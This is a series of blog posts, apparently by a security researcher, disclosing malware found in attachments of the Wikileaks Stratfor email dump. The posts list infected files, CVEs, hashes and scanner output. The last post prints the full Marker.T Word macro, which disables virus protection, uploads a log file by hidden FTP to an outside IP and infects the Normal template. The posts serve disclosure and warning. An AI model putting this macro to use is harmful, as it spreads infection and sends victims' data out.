Showing posts with label stratfor. Show all posts
Showing posts with label stratfor. Show all posts

Tuesday, September 15, 2015

Wikileaks website that hosted torrent with infected files is migrated to a new domain

UPDATED: While wlstorage.net has been taken offline and is not currently being redirected elsewhere, it looks like all of that host's functionality is now being provided by https://file.wikileaks.org - mostly as a way to facilitate torrent downloads. The new host appears to require SSL, which wlstorage.net did not. The SSL issue was particularly troubling as all of the torrents available for download on wlstorage.net were created referencing the non-SSL version of the site (establishing an unencrypted client connection between the P2P client and wlstorage.net, another great way for the powers that be to identify Wikileaks users). The torrent that includes infected files, gifiles-2014.tar.bz2.torrent, remains available for download as well.

As I discussed in my series of posts explaining how the Stratfor email dump hosted by Wikileaks contains malicious software, I first came across a series of infected files when I downloaded and reviewed a torrent file hosted on the Wikileaks subsite "wlstorage.net". A number of factors at the time lead me to believe that "wlstorage.net" was not a mirror of Wikileaks hosted by a third party, but was in fact run by the Wikileaks organization directly: notably, that both wlstorage.net and wikileaks.org resolved to the same set of IP addresses, both sites shared the same SSL certificate, and wlstorage.net was linked to throughout wikileaks.org.

 Today it was brought to my attention that wlstorage.net has been taken offline, and I verified that the DNS entry for wlstorage.net has been kiboshed. wlstorage.net uses the Wikileaks nameservers (ns1.wikileaks.org & ns2.wikileaks.org), so this change would have been performed by a trusted member of the Wikileaks technical team. I am not aware of any announcements from Wikileaks stating the reason for the removal of wlstorage.net from DNS. Whatever the reason for the change, this update has not removed the infected files from distribution.

As of this writing (9/15/2015), all of the infected files remain available for direct, individual download through a series of dozens of curated links directly from the wikileaks.org website. I have also received reports that those attempting to download the infected torrent file using a Bittorrent client are unable to find a complete peer to seed the torrent. If anyone wishes to review these files for research purposes you are welcome to contact me and I can seed temporarily. For obvious reasons I am not interested in seeding the torrent on anything like an ongoing basis, and I encourage researchers and journalists to review the infected files directly on the wikileaks.org as a first step. I have compiled a list of URLs containing infected files and posted it to PasteBin; I also have a post explaining that infected files are not restricted to the torrent file.

Wednesday, July 15, 2015

Malware discovered in the Stratfor email file dump provided by Wikileaks is not limited to torrents - curated content on the Wikileaks website also infected

Several months ago I identified malicious software contained within a torrent available for download from Wikileaks. The torrent was the most recent and most complete copy of what Wikileaks titled the "Global Intelligence Files" - a large trove of emails and attachments from defense contractor Stratfor. The story as it is widely understood is that former Lulzsec member and hacktivist Jeremy Hammond was involved in the acquisition of these files from Stratfor and provided them to Wikileaks. Among the many files included in the leak I have identified 18 that have malicious software; most of those are embedded within PDF and DOC files. Some of the attacks I discovered are old, others are less old. Only two of the 18 files are blocked from downloading using Google Chrome's malware protection service, for example. In a second post, I decompile one of these two (older) files using PE Explorer and Hex-Rays IDA to demonstrate how the file corrupts the Microsoft Connection Manager while posing as an application called iPassConnect in order to faciliate infection with a Magistr worm variant.

Since that time I have made numerous attempts to contact Wikileaks so that they could inform their users that the torrent contained malicious software. After receiving no response, I began to publicize my findings by posting them on Hacker News/Ycombinator and similar sites like Slashdot and Reddit. My post on Hacker News quickly reached the front page and attracted the attention of the former leader of Lulzsec, Hector Monsegur (aka sabu), who confirmed the validity and importance of my findings in a series of public tweets.

In my original post, I speculated that:
"The data is indeed massive, over 5.5 million emails. Perhaps so massive that ~ two years was not long enough to properly review and sanitize these files prior to their complete publication in 2014 (from the time they were received by WL sometime around 2012)."
The publication of the Global Intelligence Files by Wikileaks began on February 27th, 2012. The entire email server spool was not dumped onto the internet at one time. The publication was curated, with only a small percentage of the emails being published initially. Over time, more emails were published. This progression can be easily viewed on the directory hosting the torrents for the Stratfor leaks:
wikileaks josh wieder stratfor torrent download index
The file name of each torrent contains the date of its publication. Meanwhile, the number to the far right, beginning with 1603, indicates the size of the torrent in bytes. While the relationship between the size of a torrent and the size of the files it contains is not a direct one in all cases, in this case it is a fairly direct relationship because we are dealing with large lists of small files. The last torrent, which I have identified as containing malware, has a size of 121071 bytes. The point here is that you can see that the number of files contained in the archive grows over time.

The torrent file that contains malware is the only file in the directory with a nomenclature that does not include a full date (it was also created using bzip instead of 7zip); the filename is simply gifiles-2014.tar.bz2.torrent. Initially, this meant I was not sure of the exact date that the torrent was released.

I knew that the relatively small number of curated content was available on the Wikileaks.org website. Today I was able to confirm that malicious files and their related attachments are also being hosted on Wikileaks.org, as individual uncompressed files. I have composed a list of these files, their URLs and basic file information on pastebin: (I have embedded the pastebin below as an iframe; if you don't trust iframes in your browser you can click through the prior link instead)

NOTE: Wikileaks has multiple URLs servicing multiple directory structures, all that eventually seem to point to the same place. So for example, https://wikileaks.org/gifiles/docs/35/3547802_plans-coordinates-and-executes-.html and https://search.wikileaks.org/gifiles/emailid/3547802 both point to the same content (and include the same malware attachment available for download).

While I am not alone in my concern over the circulation of an infected torrent of the nature I described in my first post, posting individual infected files directly to *.wikileaks.org domain and several subdomains in a curated manner is likely more dangerous - users are more likely to consider the following a link to content that has in some fashion been secured:

wikileaks josh wieder stratfor emails research

An expectation that a video posted on Fox News will not contain an embedded script is not a wild expectation. Similarly a New York Times article that includes a photo in an article is usually believed to not contain spyware. This is a basic expectation of service on every website, not just news outlets. Primary sources are important. User transparency is also important.

The attached file above, "18714_Research_and_R.xls", appears to be a normal Excel spreadsheet but in fact contains an embedded OLE. It is the exact size in bytes as the same attachment I discovered within the torrent that started this series of posts:

wikileaks josh wieder stratfor emails research

Of course there is no need to take my word for it. The file contains an embedded OLE and PE file - the hallmarks of malware designed to exploit vulnerabilities in the Microsoft Office Suit. Of note are the following:

An API-Hashing signature is stored at 0x3ad1
There are two decryption loops at 0x00003932 and 0x00003934
The embedded OLE signature is stored at 0x7a00
A XOR encrypted MZ/PE signature is stored at 0x5a00 and the encryption key is 0x97
A ROL encrypted OLE signature is stored at 0x7a00 and the encryption key is 0x08

OfficeMalScanner can duplicate these results. When I ran OfficeMalScanner against "18714_Research_and_R.xls" using the brute debug scan mode, the scan produced a malicious index of 62. Several antiviruses will detect this file. Depending on which you use, it might declare the file to use CVE-2009-3129 or CVE-2009-0557 (it probably relies on both exploits at different points). I have created bin files from memory dumps of the embedded OLE and PE (as I have for the roughly dozen similar malware payloads); I am happy to provide those to interested researchers. Here are the relevant signatures:

MD5 2746a014bdd9f7bf252262b82cf63e11
SHA1 cf525700b9e1027c4628fa9689bf68777291c60d
SHA256 4f9550c3f3abbfac4153b4467666e7a46e29ab974627ffd7feed7a711d55ffcd

As I mentioned earlier in this post, Google malware service in Chrome detects only three of the so far 18 infected attachments. The two that are detected are the two oldest malware by the date sent and are both compressed executables (one a .COM and the other two are .EXE) rather than embedded within documents. Here is what downloading one of these off of the Wikileaks website looks like as of now:

wikileaks josh wieder stratfor emails research

Both of the old nasty .EXE's appear to have been sent from mfriedman@stratfor.com, which as far as I can tell, was/is the email address of Meredith Friedman, the VP of Communications for Stratfor:

 Email-ID 3451016
 Date 2003-11-04 15:32:57
 From mfriedman@stratfor.com
 To mooney@stratfor.com, wit@stratfor.com
 Subject: FW: Re[2]: our private photos bkarngkr
 
 Email-ID 3491917
 Date 2004-01-27 01:03:10
 From mfriedman@stratfor.com
 To mooney@stratfor.com
 Subject: FW: HI

Would anyone care to bet me a dollar that in late 2003 her email password was "mfriedman", her birthday, "12345" or some combination thereof?

The source of the .COM file is as follows:

 Email-ID 3547802
 Date 2001-11-10 05:16:54
 From rcleicht@worldnet.att.net
 To undisclosed-recipients:
 Subject: Plans, coordinates, and executes

Finally for today, please do not make the mistake of assuming that all of the exploits are from this time period and thus are of no important to modern computer users. I cannot make this clear enough: these two files are the *oldest* of the malicious files I have discovered.

To return to the first post in our series on the Wikileaks / Strafor email malware click here.

If you are looking for the second post, where we look briefly inside one of the executables click here.

This is the link for my conversation with Hector Monsegur AKA sabu of Lulzsec on the Wikileaks / Strafor email malware. 

Monday, July 13, 2015

Hector Monsegur (formerly sabu of Lulzsec) has responded to my analysis of the Wikileaks Global Intelligence Files

Some time ago I wrote two blog posts about my discovery about a series of malware-infected files within a torrent being circulated by global whistleblower organization Wikileaks.

The torrent file was one of the latest versions of what Wikileaks has named the "Global Intelligence Files" - a large cache of documents obtained from the email spool of a government contractor known as Stratfor.

Since my discovery I have made several attempts to contact Wikileaks:

In addition to Twitter I have attempted to email just about every address I could find on their site (none of them work), as well as attempting to use the chat function mentioned on the Wikileaks Twitter feed. I have been unable to receive a response. Users must be notified when a file transfer contains malware; particularly given the sensitive nature of the documents in question.

This afternoon I received a series of comments on Twitter from former Lulzsec member Hector Monsegur. In his comments, Monsegur denies instigating the attack that lead to the release of the Stratfor files while confirming the danger of the malware contained in the files I identified:



Hector Monsegur Josh Wieder sabu lulzsec Wikileaks
Hector Monsegur during an interview with CBS
I responded to Hector's comments by thanking him for his input, putting forth my own theory that the malware contained in the document dumps is typical of snowshoe-spam malware infiltration techniques and reiterated the importance of Wikileaks notifying users of the danger of downloading malware contained in the torrent in question:


As of this writing (3PM @ 7-13-2015) Wikileaks continues to provide a torrent file with an identical timestamp, filename and byte size as the one I analyzed without any warning message notifying users of the danger of handling the files.

To return to the first post in our series on the Wikileaks / Strafor email malware click here.

If you are looking for the second post, where we look briefly inside one of the executables click here.

And here is a link to the next post in my Wikileaks / Strafor email malware series, where I demonstrate how the malware is available file by file on the Wikileaks.Org website, and not just within the torrent as I originally suspected.

Monday, March 30, 2015

Wikileaks Global Intelligence File Dump is Loaded With Malicious Software

Click here for the second post on this topic, which includes more detailed technical information.

Hector Monsegur, formerly sabu of Lulzsec, has offered his point of view on this post. Get his opinion by reading my third post on the topic.

In my fourth post on this topic, I explain how malware is not limited to the Stratfor leak torrent - curated links throughout the Wikileaks.Org website allow users to download individual infected files.

This series of posts is beginning to receive coverage from several newspapers around the world. German speakers should check out the story in Neue Zürcher Zeitung / New Zurich Times. For English speakers, I recommend The Register from the UK for an excellent summary of these findings.

Beginning in February 27, 2012, the controversial news organization Wikileaks has been publishing a large and growing trove of emails from the private intelligence firm Strategic Forecasting, Inc (more widely known as Stratfor). The leak publication began with 200 emails, with Wikileaks progressively publishing more and more emails through the final publication date of July 18, 2014, at which time a single file containing over 5 million emails was published.

The source of the content was Jeremy Hammond, working in concert with Hector Xavier Monsegur as part of the group AntiSec. Hammond is currently in prison for the hack. Monsegur remains free; he was an FBI informant at the time of the hack and the release of the files. While the hack is attributed to Hammond, reliable sources are indicating that it was Monsegur who instigated the attack while he worked for the FBI. (NOTE: Hector X. Monsegnur has personally responded to this blog post and has denied this characterization of what happened. My only information on the history of the documents was obtained through media sources and court documents, which are often not reliable. I have not attempted to contact Jeremy Hammond. I only included this very brief foreward in an attempt to explain the history of the documents; which is still contested.)

It has been widely reported that Monsegur used an FBI-provided laptop and often worked full-time from an FBI office New York during the nine month period that the #antisec and #lulzsec released their widely distributed hacks, including the Stratfor job. To confuse matters further, court documents include reference to a third party, someone named Hyrriiya, who provided information critical to the Stratfor intrusion.

The content of the emails, though of obvious political and social significance, is not relevant to our post here. Newspapers around the world have spent a significant amount of time reporting on those leaks. However, no one appears to have noticed that a significant number of the files included in the leak contain malicious files that are designed to, among other things, retrieve detailed information about the computers which have downloaded them and send them to a variety of remote systems. 

My research at this time is still in progress, however given the wide circulation of this data & the apparent lack of notification of the danger in these files has convinced me to publish what little I have found immediately. 

I ought to be clear from the outset: I have no information linking Wikileaks, Asssange, Hammond, Monsegur, the FBI or anyone else directly with these malicious files. That very well may change quickly as research progresses, but at no point should this post be considered finger pointing. The purpose of this post is not to assign responsibility but to ensure that the journalists and activists downloading these files or who have already downloaded these files understand the consequences and take proper precautions. If I can encourage security researchers to take a look at these files it would be a bonus.

The files in question are not being distributed directly through the wikileaks.org domain, but through a secondary domain wlstorage.net. While the domains are separate, the wlstorage.net is linked directly from the Wikileak Global Intelligence Files web page (at https://wikileaks.org/gifiles), the two share the same SSL certificate as well as the same IP addresses. This would seem to (but doesn't entirely) rule out the notion that traffic is being diverted from Wikileaks to a fake server to fool users to download the malicious files.


# host wikileaks.org
wikileaks.org has address 195.35.109.53
wikileaks.org has address 91.218.114.210
wikileaks.org has address 91.218.244.152
wikileaks.org has address 95.211.113.131
wikileaks.org has address 95.211.113.154
wikileaks.org has address 195.35.109.44
wikileaks.org mail is handled by 1 mx.wikileaks.org.

# host wlstorage.net
wlstorage.net has address 91.218.114.210
wlstorage.net has address 91.218.244.152
wlstorage.net has address 95.211.113.131
wlstorage.net has address 95.211.113.154
wlstorage.net has address 195.35.109.44
wlstorage.net has address 195.35.109.53

Josh Wieder, Wikileaks, Global Intelligence Files
The Wikileaks.Org Global Intelligence Files web page
Josh Wieder, Wikileaks, Global Intelligence Files, wlstorage.net, torrent
The link to wlstorage.net from Wikileaks
The link to wlstorage.net points to a list of torrent files. As mentioned previously, Wikileaks began with a small initial leak of documents, and released progressively more documents. Each of these torrents is a different version of the leak, which over time grew to include more and more files as they were apparently reviewed by the Wikileaks team. Notice that the very last torrent uses a different compression method and file nomenclature than the rest of the torrents. It is this very last file, and this file only, that I have identified malware inside of.
Josh Wieder, Wikileaks, Global Intelligence Files, Torrent, index page
The Global Intelligence Files torrent files on wlstorage.net
The SSL Certificate for both domains is the same:
issuer= /C=FR/O=GANDI SAS/CN=Gandi Standard SSL CA
subject= /OU=Domain Control Validated/OU=Gandi Standard Wildcard SSL/CN=*.wikileaks.org
notBefore=Oct 14 00:00:00 2013 GMT
notAfter=Oct 14 23:59:59 2015 GMT
00b5f826
SHA1 Fingerprint=10:B3:D9:66:7F:BC:57:B5:C1:CF:98:5B:16:E3:EC:61:A4:C3:ED:32

# echo |\
> openssl s_client -connect wikileaks.org:443 2>&1 |\
> sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p'
-----BEGIN CERTIFICATE-----
MIIE6DCCA9CgAwIBAgIQKAc9xHmKh6q3z95GsMA9IjANBgkqhkiG9w0BAQUFADBB
MQswCQYDVQQGEwJGUjESMBAGA1UEChMJR0FOREkgU0FTMR4wHAYDVQQDExVHYW5k
aSBTdGFuZGFyZCBTU0wgQ0EwHhcNMTMxMDE0MDAwMDAwWhcNMTUxMDE0MjM1OTU5
WjBjMSEwHwYDVQQLExhEb21haW4gQ29udHJvbCBWYWxpZGF0ZWQxJDAiBgNVBAsT
G0dhbmRpIFN0YW5kYXJkIFdpbGRjYXJkIFNTTDEYMBYGA1UEAxQPKi53aWtpbGVh
a3Mub3JnMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwpQwc3GxL/BS
gnQyIoYth18lqHwl70IYbPrM1rJnQ/kgnTOBE2ztEI8DGWAxoxZaeV7XckCTproL
u6lVFQlNQWW8FxhqFwSpC6NkVUoYDcSKnxwrj9UUy15BpGwmMCUOcnIe0U1YUfGo
hzJAzoqWEmXvaYnC8iIrv2Yd+jT511/Q38hjcQWJUOxQl8XNPbuQmD1WHYhH252j
tEiTo9W72fhQa9Gdzxy2J4223n3iK4vQZx+RSwBF7JpbhUpCWXKqOnf6oboDtwsS
TDzVpdiaMUh2PhdqJR0E+dkX3h0WT1ShLiKkb3zc0D3pRoCFRLEZXMQeDCM0aLco
NHxIe4lGQwIDAQABo4IBuDCCAbQwHwYDVR0jBBgwFoAUtqj/oqgv0KbNS7Fo8+dQ
EDGneSEwHQYDVR0OBBYEFGs9iHIkjSj3V1CgThX0Fs+sNogDMA4GA1UdDwEB/wQE
AwIFoDAMBgNVHRMBAf8EAjAAMB0GA1UdJQQWMBQGCCsGAQUFBwMBBggrBgEFBQcD
AjBgBgNVHSAEWTBXMEsGCysGAQQBsjEBAgIaMDwwOgYIKwYBBQUHAgEWLmh0dHA6
Ly93d3cuZ2FuZGkubmV0L2NvbnRyYWN0cy9mci9zc2wvY3BzL3BkZi8wCAYGZ4EM
AQIBMDwGA1UdHwQ1MDMwMaAvoC2GK2h0dHA6Ly9jcmwuZ2FuZGkubmV0L0dhbmRp
U3RhbmRhcmRTU0xDQS5jcmwwagYIKwYBBQUHAQEEXjBcMDcGCCsGAQUFBzAChito
dHRwOi8vY3J0LmdhbmRpLm5ldC9HYW5kaVN0YW5kYXJkU1NMQ0EuY3J0MCEGCCsG
AQUFBzABhhVodHRwOi8vb2NzcC5nYW5kaS5uZXQwKQYDVR0RBCIwIIIPKi53aWtp
bGVha3Mub3Jngg13aWtpbGVha3Mub3JnMA0GCSqGSIb3DQEBBQUAA4IBAQAXlibh
e0R/kZ6eBGahIhYiy4fAWylbB4/G+k9OKFuz55e43aw5ADB2BGQtY3FSzghL4chn
uYBZNBHxsOeDnOisu1hxDxSLjG5oofJFzmNryOxrI2f9aC0sbGAauxM5+Wsj6kw9
ghylh6Tp6Q5X01jXlD91LD5M74NwUDrTd0Sdl1rB7A8LjEvdVTnlmzxAJDK7VQHX
fa+RXiPBqCgTaRTgBh6s7BRssMAX0P80cdTu8EkiNUODh6hmXnqKhuHLcdu9CELc
tz3okx9jRNmFP1Wp0Z7WupYUNcdMPSWEMLBjm6vYT54jFtIVeNK0sChmWxiADFBr
ElIzcmpt7JexUF8K
-----END CERTIFICATE-----


echo |\
> openssl s_client -connect wlstorage.net:443 2>&1 |\
> sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p'
-----BEGIN CERTIFICATE-----
MIIE6DCCA9CgAwIBAgIQKAc9xHmKh6q3z95GsMA9IjANBgkqhkiG9w0BAQUFADBB
MQswCQYDVQQGEwJGUjESMBAGA1UEChMJR0FOREkgU0FTMR4wHAYDVQQDExVHYW5k
aSBTdGFuZGFyZCBTU0wgQ0EwHhcNMTMxMDE0MDAwMDAwWhcNMTUxMDE0MjM1OTU5
WjBjMSEwHwYDVQQLExhEb21haW4gQ29udHJvbCBWYWxpZGF0ZWQxJDAiBgNVBAsT
G0dhbmRpIFN0YW5kYXJkIFdpbGRjYXJkIFNTTDEYMBYGA1UEAxQPKi53aWtpbGVh
a3Mub3JnMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwpQwc3GxL/BS
gnQyIoYth18lqHwl70IYbPrM1rJnQ/kgnTOBE2ztEI8DGWAxoxZaeV7XckCTproL
u6lVFQlNQWW8FxhqFwSpC6NkVUoYDcSKnxwrj9UUy15BpGwmMCUOcnIe0U1YUfGo
hzJAzoqWEmXvaYnC8iIrv2Yd+jT511/Q38hjcQWJUOxQl8XNPbuQmD1WHYhH252j
tEiTo9W72fhQa9Gdzxy2J4223n3iK4vQZx+RSwBF7JpbhUpCWXKqOnf6oboDtwsS
TDzVpdiaMUh2PhdqJR0E+dkX3h0WT1ShLiKkb3zc0D3pRoCFRLEZXMQeDCM0aLco
NHxIe4lGQwIDAQABo4IBuDCCAbQwHwYDVR0jBBgwFoAUtqj/oqgv0KbNS7Fo8+dQ
EDGneSEwHQYDVR0OBBYEFGs9iHIkjSj3V1CgThX0Fs+sNogDMA4GA1UdDwEB/wQE
AwIFoDAMBgNVHRMBAf8EAjAAMB0GA1UdJQQWMBQGCCsGAQUFBwMBBggrBgEFBQcD
AjBgBgNVHSAEWTBXMEsGCysGAQQBsjEBAgIaMDwwOgYIKwYBBQUHAgEWLmh0dHA6
Ly93d3cuZ2FuZGkubmV0L2NvbnRyYWN0cy9mci9zc2wvY3BzL3BkZi8wCAYGZ4EM
AQIBMDwGA1UdHwQ1MDMwMaAvoC2GK2h0dHA6Ly9jcmwuZ2FuZGkubmV0L0dhbmRp
U3RhbmRhcmRTU0xDQS5jcmwwagYIKwYBBQUHAQEEXjBcMDcGCCsGAQUFBzAChito
dHRwOi8vY3J0LmdhbmRpLm5ldC9HYW5kaVN0YW5kYXJkU1NMQ0EuY3J0MCEGCCsG
AQUFBzABhhVodHRwOi8vb2NzcC5nYW5kaS5uZXQwKQYDVR0RBCIwIIIPKi53aWtp
bGVha3Mub3Jngg13aWtpbGVha3Mub3JnMA0GCSqGSIb3DQEBBQUAA4IBAQAXlibh
e0R/kZ6eBGahIhYiy4fAWylbB4/G+k9OKFuz55e43aw5ADB2BGQtY3FSzghL4chn
uYBZNBHxsOeDnOisu1hxDxSLjG5oofJFzmNryOxrI2f9aC0sbGAauxM5+Wsj6kw9
ghylh6Tp6Q5X01jXlD91LD5M74NwUDrTd0Sdl1rB7A8LjEvdVTnlmzxAJDK7VQHX
fa+RXiPBqCgTaRTgBh6s7BRssMAX0P80cdTu8EkiNUODh6hmXnqKhuHLcdu9CELc
tz3okx9jRNmFP1Wp0Z7WupYUNcdMPSWEMLBjm6vYT54jFtIVeNK0sChmWxiADFBr
ElIzcmpt7JexUF8K
-----END CERTIFICATE-----

I have reviewed the last two file dumps listed in the wlstorage.net torrent list: gifiles-20121104151320.7z & gifiles-2014.tar.bz2. I was unable to identify any malware in 20121104151320.7z - which is notable for a number of reasons. Each of these files is massive - gifiles-20121104151320.7z is close to 3GB while compressed. However, gifiles-2014.tar.bz2 is 9x the size of gifiles-20121104151320.7z. The two files also use a different encryption scheme. 7zip is a Windows compression program, and 7zip was used to make every gifiles torrent dump except for gifiles-2014.tar.bz2 - which uses Tar and BZip, used commonly in Windows & Linux. Its reasonable to assume that gifiles-2014.tar.bz2 was created on a different computer than all of the other distributions. 

I've identified the following exploits being used:


MARKER.T 
CVE-2006-2492
CVE-2009-0557 
CVE-2011-0611 
CVE-2010-3333 
HEAPSPRAY 
Mydoom 
Magistr 
Pdfjsc.BP 
Wordjmp.gen 
Mimail 

The software vulnerable to these exploits is (version omitted while research is in progress): 

Adobe Acrobat
Adobe Flash Player
ActiveX
Microsoft Office
Microsoft Office for Mac
Open XML File Format Converter

These exploits are contained in the following files:

gifiles-2014\gifiles\attach\6\6566_The Split Betw.doc
gifiles-2014\gifiles\attach\19\19701_MASY - Q MASY HUMINT.doc
gifiles-2014\gifiles\attach\19\19719_List of Addresses - Advance Copies.doc
gifiles-2014\gifiles\attach\152\152977_Happy vacation.pdf
gifiles-2014\gifiles\attach\18\18714_Research_and_R.xls
gifiles-2014\gifiles\attach\117\117687_Lithium.doc
gifiles-2014\gifiles\attach\117\117870_Hybrid write-up2.doc
gifiles-2014\gifiles\attach\117\117793_Hybrid write-up.doc
gifiles-2014\gifiles\attach\47\47247_US Congress re.doc
gifiles-2014\gifiles\attach\47\47329_US Congress re.doc
gifiles-2014\gifiles\attach\52\52004_IRAN_STRAIT_PART.pdf
gifiles-2014\gifiles\attach\151\151784_Command.com
gifiles-2014\gifiles\attach\151\151098_text.zip->(Zip)
gifiles-2014\gifiles\attach\151\151098_text.zip->text.exe
gifiles-2014\gifiles\attach\119\119443_Russia Data Requests.doc
gifiles-2014\gifiles\attach\142\142345_photos.zip->(Zip)
gifiles-2014\gifiles\attach\142\142345_photos.zip->photos.jpg.exe
gifiles-2014\gifiles\attach\146\146924_message.zip->(Zip)
gifiles-2014\gifiles\attach\146\146924_message.zip->message.exe
gifiles-2014\gifiles\attach\17\17102_Draft scenarios for Libya_0416.pdf

These attachments are just phishing nonsense and dont contain malicious software but if you scan this dump with an antivirus they may cause a positive:

gifiles-2014\gifiles\docs\34\3485657_your-friend-cj-saw-miniture-tesla-generator-in-action-live.html
gifiles-2014\gifiles\attach\20\20497_PP-001-460-891-520.html

I have been working on extracting the payloads from the .DOC files first before moving on to the .PDFs and attempting to decompile the few executables. I have been able to confirm that the exploits and payloads in 117687_Lithium.doc, 117870_Hybrid write-up2.doc and 17793_Hybrid write-up.doc are identical. Here are the relevant signatures for the files:

117687_Lithium.doc
md5 6451dc0fc47122e75e3af66c9547d420
sha1 88eaf2aaa211d761c190d310d181f9f4e8d3853b
sha256 34b2bb5d9ac4abbf39d303dadabd3c6e45033643070bd3636ccab74b37d6f2d2

17793_Hybrid write-up.doc
md5 87114142e32fd455b525c900e4342475
sha1 cfda55de190f6b71434b4a4b66b2a372773133db
sha256 9bde32a6679339263d69a23da7b971ffb5c9882fbae9be311eeb28c49e817358

117870_Hybrid write-up2.doc
md5 6fde4a58f42deba3613030cbb93aef2b
sha1 07191e232304f3c7853e18916bb89f8af4cda3b1
sha256 32473591c2aa8bb96f9d48b224726f39480327606eb35641a2b4f2493af81655

Each of these three documents contains the following Visual Basic macro, a classic Marker.T that is well over 10 years old:
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
On Error Resume Next
Const Marker = "<- this is a marker!"
'Declare Variables
Dim SaveDocument, SaveNormalTemplate, DocumentInfected, NormalTemplateInfected As Boolean
Dim ad, nt As Object
Dim OurCode, UserAddress, LogData, LogFile As String
'Initialize Variables
Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
Set nt = NormalTemplate.VBProject.VBComponents.Item(1)
DocumentInfected = ad.CodeModule.Find(Marker, 1, 1, 10000, 10000)
NormalTemplateInfected = nt.CodeModule.Find(Marker, 1, 1, 10000, 10000)
'Switch the VirusProtection OFF
Options.VirusProtection = False
  If (Day(Now()) = 1) And (System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogFile") = False) Then
    If DocumentInfected = True Then
      LogData = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)
    ElseIf NormalTemplateInfected = True Then
      LogData = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines)
    End If
    LogData = Mid(LogData, InStr(1, LogData, "' Log" & "file -->"), Len(LogData) - InStr(1, LogData, "' Log" & "file -->"))
    For i = 1 To 4
      LogFile = LogFile + Mid(Str(Int(8 * Rnd)), 2, 1)
    Next i
    LogFile = "C:\hsf" & LogFile & ".sys"
    Open LogFile For Output As #1
    Print #1, LogData
    Close #1
    Open "c:\netldx.vxd" For Output As #1
    Print #1, "o 209.201.88.110"
    Print #1, "user anonymous"
    Print #1, "pass itsme@"
    Print #1, "cd incoming"
    Print #1, "ascii"
    Print #1, "put " & LogFile
    Print #1, "quit"
    Close #1
    Shell "command.com /c ftp.exe -n -s:c:\netldx.vxd", vbHide
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info", "LogFile") = True
  End If
'Make sure that some conditions are true before we continue infecting anything
If (DocumentInfected = True Xor NormalTemplateInfected = True) And _
   (ActiveDocument.SaveFormat = wdFormatDocument Or _
   ActiveDocument.SaveFormat = wdFormatTemplate) Then
  'Infect the NormalTemplate
  If DocumentInfected = True Then
    SaveNormalTemplate = NormalTemplate.Saved
    OurCode = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)
      'Write a log file of this NormalTemplate infection
    For i = 1 To Len(Application.UserAddress)
      If Mid(Application.UserAddress, i, 1) <> Chr(13) Then
        If Mid(Application.UserAddress, i, 1) <> Chr(10) Then
          UserAddress = UserAddress & Mid(Application.UserAddress, i, 1)
        End If
      Else
        UserAddress = UserAddress & Chr(13) & "' "
      End If
    Next i
    OurCode = OurCode & Chr(13) & _
              "' " & Format(Time, "hh:mm:ss AMPM - ") & _
                     Format(Date, "dddd, d mmm yyyy") & Chr(13) & _
              "' " & Application.UserName & Chr(13) & _
              "' " & UserAddress & Chr(13)
    nt.CodeModule.DeleteLines 1, nt.CodeModule.CountOfLines
    nt.CodeModule.AddFromString OurCode
    If SaveNormalTemplate = True Then NormalTemplate.Save
  End If
  'Infect the ActiveDocument
  If NormalTemplateInfected = True And _
     (Mid(ActiveDocument.FullName, 2, 1) = ":" Or _
     ActiveDocument.Saved = False) Then
    SaveDocument = ActiveDocument.Saved
    OurCode = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines)
    ad.CodeModule.DeleteLines 1, ad.CodeModule.CountOfLines
    ad.CodeModule.AddFromString OurCode
    If SaveDocument = True Then ActiveDocument.Save
  End If
End If
End Sub

We shouldn't be convinced that this is the entire payload. The IP address included here has been recorded as a part of Marker.T since 2002. Just to be on the safe side, I tried it - there are no FTP connections being accepted at 209.201.88.110, which looks like it is assigned to a Vietnamese restaurant in New Jersey.

Using OfficeMalScanner provides further information:


[*] SCAN mode selected
[*] Opening file 117870_Hybrid write-up2.doc
[*] Filesize is 604672 (0x93a00) Bytes
[*] Ms Office OLE2 Compound Format document detected
[*] Scanning now...

             +++++ decryption loop detected at offset: 0x00019eb8 +++++


33C9                               xor ecx, ecx
E7EE                               out EEh, eax
2974E835                           sub [eax+ebp*8+35h], esi
79F7                               jns $-07h
34A2                               xor al, A2h
12F5                               adc dh, ch
72F7                               jb $-07h
94                                 xchg esp, eax
BA0EE6EEA9                         mov edx, A9EEE60Eh
7909                               jns $+0Bh
E615                               out 15h, al
774F                               jnbe $+51h
51                                 push ecx
B42F                               mov ah, 2Fh
EE                                 out dx, al
9E                                 sahf 
--------------------------------------------------------------------------


Brute-forcing for encrypted PE- and embedded OLE-files now...
Bruting XOR Key: 0x01
....

Analysis finished!

------------------------------------------------------------------------
117870_Hybrid write-up2.doc seems to be malicious! Malicious Index = 10
------------------------------------------------------------------------

There appears to be an additional payload in these files that is encrypted, in addition to the VBScript macro that sits on top. Uncovering it will take me a bit more time.

In addition to these three files I have also been working on a fourth file that makes use of a different set of exploits, 6566_TheSplitBetw.doc. Don't be fooled by the .DOC extension, this is an RTF file. 6566_TheSplitBetw.doc uses a classic RTF exploit: CVE-2010-3333.

md5 d93e2a5f8ac23824abc07f536aa4c50d
sha1 87584d1f761c3d8f34c4077da5aeadd4b1a470ca
sha256 e74fc919fba1cc8e9bc9680f026df8d4875c9f0f5864596445859ff916898b38

This exploit has been used in a number of attacks. In June 2011 a University of Louisville email server began sending out an email with an attachment claiming to be an "Insider's Guide to Military Benefits". The body of the email appeared to target Naval officers:

-----Original Message-----
From: CDR Courtney Bricks [mailto:cbricks@gmail.com] 
Sent: Tuesday, May 31, 2011 11:23 PM
To: xxxxxx
Subject: Defense News article of interest


Sir,
